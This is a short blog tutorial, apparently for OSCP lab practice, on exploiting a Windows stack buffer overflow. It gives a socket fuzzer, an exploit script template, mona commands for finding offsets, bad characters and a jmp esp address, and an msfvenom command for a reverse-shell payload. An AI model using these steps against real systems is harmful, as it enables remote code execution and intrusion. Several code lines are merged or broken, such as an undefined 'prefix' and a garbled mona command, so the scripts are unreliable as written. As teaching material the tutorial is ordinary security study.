Steps To Exploit Buffer Overflow

etCyberGuy

·

Follow

2 min read

·

Apr 20, 2022

--

Listen

Share

• First, you’ll need to install an immunity debugger on windows OS
• Load your executable binary file to the Immunity debugger
• Config your environment by setting your directory environment to the following

!mona config -set workingfolder c:\mona\%p

• Start the loaded service and go-ahead for your enumeration

Enumeration

• create a fuzzer script to check the length at which the service could crash.

#!/usr/bin/env python3import socket, time, sysip = "10.10.4.64" #change thisport = 9999 #change this
timeout = 5string = "A" * 100while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

• run fuzzer to see the length which crashes

python3 fuzzer.py

Exploitation

• crashing the replication and controlling the EIP register
• to generate a cyclic pattern use the following
• to see what length can crash the server use the fuzzer.py
• then generate a pattern with that length + plus

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600

• set generated pattern into your payload exploit and restart the oscp and exploit
• Create a python script and paste the following content

import socketip = "10.10.4.64" #change this
port = 9999 # change thisoffset = 0
overflow = b"A" * offset
retn = b""
padding = b""
payload=()
postfix = b""buffer = overflow + retn + padding + payload + postfixprint(buffer)
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.recv(1024)
  s.recv(1024)
  s.send(bytes(buffer + "\r\n"))
  print("Done!")
except:
  print("Could not connect.")

• now you can execute it

python3 exploit.py

• on the oscp find the created binary by using

!mona findmsp -distance len

• now you can update your exploit to the offset you got from the command and the payload to empty string and the return variable to ‘BBBB’ to run the script.
• generate byte array using mona and exclude the null byte (x00) by default

!mona bytearray -b "\x00"

• now generate a string of bad chars identical to the byte array. and put as a payload in your script
• restart oscp and execute your exploit script. note the address of ESP you got

!mona compare -f C:\mona\oscp\bytearray.bin -a <address>

• now you can remove those bad chars from your script and restart oscp and the exploit. note that not all outputs are bad chars they might affect the next chars.
• find the jumping point.

!mona jmp -r esp -cpb "\x00\x\x\x\- finds all "jmp esp" instructions with addresses that don't contain any of the bad chars specified

• choose an address and change your exploit retn value to the reversed address you got
• generate payload using Metasploit and set it to your exploit payload variable

msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c

• copy and replace the payload
• set your padding value to some number in case you need additional space while you exploit

padding = "\x90" * 16

• exploit

python3 exploit.py